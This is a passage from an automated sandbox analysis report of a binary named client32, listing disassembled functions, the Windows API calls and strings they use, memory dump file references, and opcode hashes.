                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                              • String ID:
                                                                              • API String ID: 398584587-0
                                                                              • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                              • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                              • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                              • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                              Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                              • _free.LIBCMT ref: 1100EE64
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1100EE77
                                                                              • _free.LIBCMT ref: 1100EE8A
                                                                              • _free.LIBCMT ref: 1100EE9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                              • String ID:
                                                                              • API String ID: 3515823920-0
                                                                              • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                              • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                              • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                              • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                              Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • wsprintfA.USER32 ref: 1114650E
                                                                              • wsprintfA.USER32 ref: 11146524
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • Part of subcall function 11143E00: FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateFolderPathwsprintf$ChangeCloseFindModuleNameNotification
                                                                              • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                              • API String ID: 1400454717-2600120591
                                                                              • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                              • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                              Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                              • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                              • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                              • CoUninitialize.OLE32 ref: 110F4BE6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                              • String ID:
                                                                              • API String ID: 3550192930-0
                                                                              • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                              • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                              Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile$ChangeCloseFindNotification
                                                                              • String ID: "
                                                                              • API String ID: 353575653-123907689
                                                                              • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                              • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                              Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,AB86ACF8,74DF2EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                              • String ID: Client$DisableGeolocation
                                                                              • API String ID: 3315423714-4166767992
                                                                              • Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                              • Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                              Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                              • TranslateMessage.USER32(?), ref: 11027850
                                                                              • DispatchMessageA.USER32(?), ref: 11027856
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                              • String ID: Exit Msgloop, quit=%d
                                                                              • API String ID: 3212272093-2210386016
                                                                              • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                              • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                              Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110179ED
                                                                                • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101792C
                                                                                • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017842
                                                                                • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                              • SetEvent.KERNEL32(00000318), ref: 11017A0D
                                                                              • GetTickCount.KERNEL32 ref: 11017A13
                                                                              Strings
                                                                              • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                              • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                              • API String ID: 3804766296-4122679463
                                                                              • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                              • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                              Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ChangeCloseCreateFindNotificationThread__wcstoi64
                                                                              • String ID: *AutoICFConfig$Client
                                                                              • API String ID: 3838223534-59951473
                                                                              • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                              • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                              Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
